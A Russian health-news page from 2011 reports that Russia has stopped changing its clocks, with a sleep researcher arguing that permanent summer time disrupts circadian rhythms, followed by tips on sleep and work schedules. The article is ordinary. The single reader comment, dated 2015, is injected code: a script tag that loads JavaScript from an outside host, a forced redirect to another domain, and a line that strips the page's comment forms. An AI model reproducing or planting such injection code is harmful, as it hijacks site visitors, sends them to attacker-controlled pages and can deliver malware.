Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Телу время  >>  Телу время
 
Обратная связь
 

Телу время

Размер шрифта
01 ноября 2011 07:03
  • google_analytics: false
  • Нравится

Понедельник начался с легкого замешательства. Пиратские версии Windows, некоторые модели сотовых телефонов и продукция компании Apple (iPad, iPhone) не вняли приказу президента Дмитрия Медведева и по привычке перевелись на зимнее время. Особо невнимательные обладатели гаджетов даже опоздали на важные встречи из-за этого. Угрожает ли отмена сезонного перевода стрелок нашему здоровью?

1

Немного истории

Время – условная категория. Раньше люди не нуждались в точном исчислении и меряли свою жизнь согласно сельскохозяйственным соображениям: с восходом солнца нужно было встать и подоить корову, а вечером упасть в стог сена и заснуть. С развитием капитализма и промышленной революции время нуждалось в более четком определении. В 18 веке на часах появляется секундная стрелка, а в формуле «время – деньги» постепенно начинают преобладать «деньги».

Чехарда с переходом на зимнее время и обратно была продиктована именно экономическими соображениями. Якобы при этом большая часть рабочего дня выпадает на светлое время суток, что позволяет сохранить энергию для освещения. О влиянии этих изменений на человеческий организм никто не думал – экономическая выгода была важнее.

В начале 2011 года Дмитрий Медведев заявил об отмене перехода на зимнее время, так как «необходимость адаптироваться к переводу стрелок часов связана со стрессом и с заболеваниями». 27 марта мы последний раз перевели стрелки на часах. Теперь мы будем постоянно жить в летнем времени, которое опережает солнечное поясное время на 2 часа.

Застреленные

– Хорошо, что мы перестали переводить стрелки. Однако мы оставили летнее время – это неправильно. Медики и ученые дружно говорят о том, что нужно жить по естественному времени – солнечному поясному времени. Но никто нас не слушает – чиновники поступают так, как хотят. Якобы им так удобнее совещания проводить. А то, что людям приходится затемно вставать – им все равно», – рассказал «Здоровье Инфо» сомнолог, ведущий научный сотрудник Института проблем экологии и эволюции имени А.Н. Северцова Владимир Матвеевич Ковальзон.

По мнению председателя Санкт-Петербургского общественного комитета «За восстановление в России жизни по поясному времени» Вячеслава Апрелева, новая система исчисления времени еще хуже, чем старая. Ведь раньше за счет перевода стрелок на зимнее время мы были на час ближе к поясному времени.

– Наша биологическая система такова, что ее нужно постоянно подстраивать под свой режим. Однако это должно происходить в условиях солнечного света, а не электрического, так как он неэффективен по своему спектру. А так получается, что мы делаем со временем, что захотим. Такого вообще нет ни в одной стране мира! – восклицает Владимир Матвеевич Ковальзон. Вставая затемно, человек нарушает естественный распорядок, вносит сбой в свои биологические часы. Ведь у нас внутри все по плану – подъем, принятие пищи, отход ко сну. Молодые люди не замечают этого (ночью на дискотеку, утром на учебу), а вот дети и пожилые чувствуют любые колебания.

Игры со временем приводят к нарушению циркадного ритма и цикла «сон-бодрствование». Приведем простой пример. Чтобы попасть на работу в 8 утра, необходимо встать примерно в 6 утра. Отнимаем 2 часа «добавленного времени» и получается 4 утра. То есть мы просыпаемся глубокой ночью и теряем пару часов, которые могли бы потратить на естественный сон.

Что делать?


  1. Высыпайтесь.

Нехваток сна приводит к развитию целого ряда заболеваний, о которых сомнологи даже не представляли – тут и аутоимунные, ожирение и даже раковые образования. При этом вам никто не назовет точную цифру, сколько нужно спать.

– Количество сна генетически предопределено. Его нужно найти индивидуально. Есть те, кому нужно всего 5-6 часов для сна, так называемый «ген Наполеона». Есть люди, которым мало и 8 часов. Здесь только одно правило – нужно высыпаться, – считает Владимир Матвеевич.

  1. Смените график.

«Плавающий» или свободный рабочий график намного полезнее для здоровья, чем строгий режим «от звонка до звонка». Попробуйте договориться со своим работодателем о сдвиге начала рабочего дня на пару часов. Естественно, это будет намного проще реализовать, если вы работаете на частном предприятии. Сотрудники государственных учреждений едва ли могут позволить себе такую роскошь.

  1. Найдите другую работу.

Если начальство не идет вам навстречу, а каждое утро превращается в мучение, возможно, вам следует найти другую работу. Ведь сменить ее намного проще, чем часовой пояс. Или страну.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выбирайте матрас правильно   Как уснуть, если мысли бегают в голове   В какой позе спать, чтобы ничего не болело?   Хотите секса? Ложитесь спать!  
17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть? 30 января 2013Хотите не чувствовать боли – спите дольше
 
04 января 2013Сбылась мечта студента: уснул, а утром уже все знаешь 04 октября 2012Чем меньше спишь, тем быстрее теряешь рассудок
 

Слайдшоу

1
Почему женщины не могут выспаться? Как спать, когда все болит
Как избавиться от храпа мужа или своего? Как наконец-то уснуть и выспаться
9 причин заснуть прямо сейчас Как не убить мужа в постели
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.